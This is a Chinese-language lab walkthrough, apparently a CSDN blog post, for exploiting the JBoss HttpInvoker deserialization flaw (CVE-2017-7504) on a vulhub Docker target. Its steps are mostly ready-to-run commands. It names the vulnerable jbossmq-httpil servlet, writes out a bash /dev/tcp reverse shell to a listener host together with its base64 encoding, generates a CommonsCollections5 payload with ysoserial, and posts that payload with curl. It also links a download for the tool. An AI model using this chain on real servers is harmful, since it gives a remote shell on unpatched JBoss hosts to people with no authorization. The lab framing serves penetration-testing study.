中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)

中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)

JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。


目录:

[中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)](#中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504))

漏洞靶场:

[靶场准备:Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客](#靶场准备:Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客)

漏洞测试:

[第一步:访问存在的漏洞 URL 链接.](#第一步:访问存在的漏洞 URL 链接.)

[第二步:使用 Base64 编码,把 需要映射连接的代码 进行编码.](#第二步:使用 Base64 编码,把 需要映射连接的代码 进行编码.)

[第三步:使用 工具 把代码生成一个可上传的文件.](#第三步:使用 工具 把代码生成一个可上传的文件.)

[第四步:监听的主机进行监听(我这里是 172.16.10.136 主机,监听端口是 5566 和编码一样就行.)](#第四步:监听的主机进行监听(我这里是 172.16.10.136 主机,监听端口是 5566 和编码一样就行.))

第五步:把生成的文件上传到存在漏洞的页面就行,监听主机那边就会返回对方的命令页面.



复制代码
常用的默认端口:1098,1099,4444,4445,8080,8009,8083,8093 

受影响系统及应用版本    Jboss AS 5.x、Jboss AS 6.x

漏洞靶场:

靶场准备: Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客

复制代码
​
cd vulhub/jboss/CVE-2017-7504        // 切换到漏洞目录.

docker-compose up -d                  // 开启漏洞靶场.

复制代码
http://172.16.10.11:8080

# 访问开启服务的IP地址:8080 

漏洞测试:

第一步:访问存在的漏洞 URL 链接.

复制代码
http://172.16.10.11:8080/jbossmq-httpil/HTTPServerILServlet

http://漏洞的IP地址:端口/jbossmq-httpil/HTTPServerILServlet    # 后面的是存在漏洞的页面.

第二步:使用 Base64 编码,把 需要映射连接的代码 进行编码.

复制代码
bash -i >& /dev/tcp/172.16.10.136/5566 0>&1

bash -i >& /dev/tcp/监听主机的IP地址(kali)/监听端口 0>&1

第三步:使用 工具 把代码生成一个可上传的文件.

复制代码
工具链接:

链接:https://pan.baidu.com/s/11_V9awYc1qnTpG3JIDPwYQ 

提取码:tian

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTM2OjU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser


YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTM2OjU1NjYgMD4mMQ==    
#这个就是上面的 需要映射连接的代码 进行了编码,别的IP则进行别的编码就行.

第四步:监听的主机进行监听(我这里是 172.16.10.136 主机,监听端口是 5566 和编码一样就行.)


第五步:把生成的文件上传到存在漏洞的页面就行,监听主机那边就会返回对方的命令页面.

复制代码
curl http://172.16.10.11:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

curl http://目标IP地址/端口/jbossmq-httpil/HTTPServerILServlet --data-binary 上传这个文件.
相关推荐
聚铭网络18 分钟前
【一周安全资讯0509】《网络安全技术 网络安全漏洞分类分级指南》等5项国家公开标准意见;DENIC报告德国国家域名.de出现解析故障
安全·web安全
星幻元宇VR1 小时前
VR科普大空间:沉浸式公共教育新模式
科技·学习·安全·vr·虚拟现实
C2H5OH3 小时前
PortSwigger SQL注入LAB5 & LAB6
网络安全
飞飞传输6 小时前
数字化科研提速关键 构建安全可控一体化跨网数据传输体系
大数据·运维·安全
wanhengidc6 小时前
服务器中带宽的重要性
运维·服务器·网络·安全·web安全
TENSORTEC腾视科技6 小时前
腾视科技AI大模型应用:提效、破局与落地,重塑智能新生态
人工智能·科技·安全·ai·ai大模型·无人叉车及智能调度系统解决方案
java资料站7 小时前
常用中间件快速搭建
docker·中间件
Lust Dusk8 小时前
移动安全资产--MobSF工具搭建教程
网络·安全·web安全·安全架构
сокол8 小时前
【网安-Web渗透测试-内网渗透】局域网ARP攻击与DNS劫持
服务器·网络·网络安全
pencek8 小时前
Hack-The-Box-Facts
网络安全